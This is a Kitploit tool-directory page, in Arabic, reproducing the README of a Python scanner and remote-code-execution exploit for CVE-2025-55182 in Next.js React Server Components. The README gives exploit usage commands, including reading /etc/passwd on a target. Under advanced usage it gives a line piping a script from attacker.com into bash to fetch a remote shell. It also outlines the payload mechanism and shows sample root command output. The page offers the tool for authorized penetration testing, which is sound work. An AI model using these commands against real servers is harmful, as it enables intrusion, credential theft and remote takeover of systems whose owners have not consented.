Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات **React Server Components (RSC)** في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال RCE. | Kitploit
أدوات/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات **React Server Components (RSC)** في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال RCE.

عرض المستودع
16منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RSC Detector - ماسح ثغرات مكونات خادم React

ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات مكونات خادم React (RSC) في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال تنفيذ الأوامر عن بُعد (RCE).

⚠️ تحذير: هذه الأداة مخصصة لاختبارات الأمن المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن كتابي قبل الاختبار.


الميزات

✅ الكشف السلبي - يحلل HTML والترويسات وبنية الصفحة للبحث عن مؤشرات RSC
✅ تحديد البصمة النشط - يرسل ترويسات خاصة بـ RSC لاكتشاف استجابات الخادم
✅ تحليل ترويسات HTTP - يحدد الترويسات المتعلقة بـ Next.js و RSC
✅ استغلال RCE - ينفذ أوامر على الخوادم الضعيفة (إذا كانت قابلة للاستغلال)
✅ مخرجات طرفية ملونة - تغذية بصرية محسّنة لوضوح أفضل
✅ الوضع التفاعلي - تنفيذ أوامر متعددة في وضع الاستغلال
✅ فك ترميز قوي - يعالج الحمولات المضغوطة بـ gzip والبيانات الثنائية


التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • pip (مدير حزم بايثون)

الإعداد

  1. استنساخ المستودع

    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. تثبيت التبعيات

    pip install -r requirements.txt
    

    الحزم المطلوبة:

    • requests>=2.28.0 - مكتبة عميل HTTP
    • urllib3>=1.26.0 - أدوات HTTP متقدمة
    • colorama>=0.4.6 - ألوان الطرفية (متوافق مع ويندوز)
    • beautifulsoup4 - تحليل HTML

الاستخدام

الكشف الأساسي (بدون استغلال)

python rsc_detector.py https://example.com

فحص كامل مع الاستغلال

python rsc_detector.py https://example.com --exploit

تنفيذ أمر محدد

python rsc_detector.py https://example.com --exploit --cmd "whoami"

وضع الاستغلال التفاعلي

python rsc_detector.py https://example.com --exploit

ثم أدخل الأوامر في الموجه (اكتب quit للخروج).


خيارات سطر الأوامر

الخيارالوصف
<URL>عنوان الهدف (مطلوب). يضيف https:// تلقائيًا إذا كان مفقودًا
--exploitتفعيل استغلال RCE بعد الكشف
--cmd <command>تنفيذ أمر محدد (يُستخدم مع --exploit)

أمثلة

اكتشاف ثغرة RSC:

python rsc_detector.py https://target.com

استغلال وتنفيذ أمر id:

python rsc_detector.py https://target.com --exploit --cmd "id"

استغلال وتنفيذ cat /etc/passwd:

python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

الوضع التفاعلي (أوامر متعددة):

python rsc_detector.py https://target.com --exploit

كيف يعمل

1. الفحص السلبي

  • يتحقق من علامة window.__next_f (موجه تطبيقات Next.js)
  • يكتشف نوع المحتوى text/x-component
  • يبحث عن علامات بروتوكول React Flight
  • يحلل __NEXT_DATA__ وعمليات الاستيراد في Next.js

2. تحليل الترويسات

  • يفحص ترويسات Server و Vary و X-Nextjs-Cache
  • يحدد دعم RSC في ترويسات HTTP

3. تحديد البصمة النشط

  • يرسل طلبات مع ترويسة RSC: 1
  • يحلل استجابة الخادم للترويسات الخاصة بـ RSC
  • يكتشف بنية بروتوكول React Flight

4. استغلال RCE

  • يبني حمولة JSON خبيثة تستغل تسلسل مكونات خادم React
  • يرسل بيانات نموذج متعددة الأجزاء (multipart form-data) لتحفيز تنفيذ التعليمات البرمجية من جانب الخادم
  • يفك ترميز مخرجات الأوامر المشفرة بـ base64
  • يدعم الاستجابات المضغوطة بـ gzip

المخرجات والنتائج

نتائج الكشف

[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

مخرجات الاستغلال

[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

تفاصيل الثغرة

تستغل CVE-2025-55182:

  • عيوب تسلسل مكونات خادم React (RSC)
  • ثغرات إلغاء تسلسل إجراءات خادم Next.js (Server Actions)
  • تلوث النموذج الأولي للكائنات (Prototype Pollution) عبر حمولات خبيثة
  • حقن الأوامر عبر child_process.execSync()

سطح الهجوم

  • تطبيقات Next.js التي تستخدم موجه التطبيقات (App Router)
  • المكونات الخادمية ذات المدخلات التي يتحكم فيها المستخدم
  • التطبيقات التي تم تمكين RSC فيها دون تحقق مناسب

الإرشادات القانونية والأخلاقية

⚠️ مهم

هذه الأداة مخصصة حصريًا لاختبارات الأمن المصرح بها فقط:

  1. ✅ افعل: استخدمها على الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها
  2. ✅ افعل: أبلغ البائع بالثغرات بطريقة مسؤولة
  3. ✅ افعل: اتبع ممارسات الإفصاح المسؤول
  4. ❌ لا تفعل: استخدمها ضد أنظمة دون إذن
  5. ❌ لا تفعل: استخدمها لأغراض خبيثة
  6. ❌ لا تفعل: تخزّن أو تنفّذ بيانات حساسة

الوصول غير المصرح به إلى أجهزة الكمبيوتر غير قانوني بموجب:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) - الولايات المتحدة
  • قانون إساءة استخدام الحاسوب لعام 1990 - المملكة المتحدة
  • قوانين مماثلة في معظم البلدان

الإفصاح المسؤول

إذا اكتشفت ثغرة باستخدام هذه الأداة:

  1. لا تفصح علنًا حتى يقوم البائع بإصدار التصحيح
  2. تواصل مباشرة مع فريق الأمن لدى البائع
  3. امنح 90 يومًا لتطوير التصحيح
  4. نسّق مع البائع بشأن توقيت الإفصاح
  5. انسب الفضل لنفسك في النشرات الاستشارية بعد الإفصاح

استكشاف الأخطاء وإصلاحها

أخطاء شهادات SSL

تتجاهل الأداة التحقق من SSL افتراضيًا. لتمكين التحقق:

detector = RSCDetector(url, verify_ssl=True)

أخطاء فك ترميز Base64

تقوم الأداة تلقائيًا بـ:

  • إضافة حشو (padding) لسلاسل base64 غير الصالحة
  • اكتشاف وفك ضغط حمولات gzip
  • الرجوع إلى أحرف استبدال UTF-8 للبيانات الثنائية

عدم وجود مفتاح "digest" في الاستجابة

  • قد لا يكون الهدف ضعيفًا
  • قد يقوم الخادم بتصفية حمولة الاستغلال
  • جرّب الاختبار اليدوي أو نقاط نهاية مختلفة

مشاكل المهلة الزمنية (Timeout)

قم بزيادة المهلة الزمنية في الكود:

response = self.session.get(self.url, timeout=30)  # 30 seconds

هيكل المشروع

CVE-2025-55182/
├── README.md                # This file
├── requirements.txt         # Python dependencies
├── rsc_detector.py         # Main scanner & exploit engine
├── rsc_cli.py              # CLI utilities (if present)
├── script.py               # Additional scripts (if present)
├── COLOR_GUIDE.md          # Color output documentation
└── .gitignore              # Git ignore rules

التبعيات

requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

ثبّت الكل دفعة واحدة:

pip install -r requirements.txt

نصائح الأداء

  • تسريع الكشف: تجاهل علامة --exploit إذا كنت تفحص فقط
  • الاختبار المجمع: أنشئ برنامجًا نصيًا لفحص عناوين URL متعددة
  • مهلة الشبكة: اضبط قيم المهلة للشبكات البطيئة
  • تجاوز SSL: التحقق معطّل افتراضيًا للمرونة

الاستخدام المتقدم

تنفيذ أوامر مخصصة

python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

إعادة توجيه المخرجات

python rsc_detector.py https://target.com > scan_results.txt 2>&1

الفحص المجمع

for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

القيود

  • ⚠️ يعمل فقط على إعدادات Next.js الضعيفة
  • ⚠️ يتطلب تمكين RSC على التطبيق الهدف
  • ⚠️ قد تقوم بعض الخوادم بتصفية أو حظر حمولات الاستغلال
  • ⚠️ قد لا تظهر المخرجات الثنائية بشكل صحيح في الطرفية
  • ⚠️ يعتمد تنفيذ الأوامر على صلاحيات الخادم

المساهمة

وجدت خطأ أو لديك تحسين؟ المساهمات مرحب بها!

  1. انسخ المستودع (Fork)
  2. أنشئ فرع ميزة (git checkout -b feature/improvement)
  3. احفظ تغييراتك (git commit -am 'Add feature')
  4. ادفع إلى الفرع (git push origin feature/improvement)
  5. قدّم طلب سحب (Pull Request)

تنزيل الأداة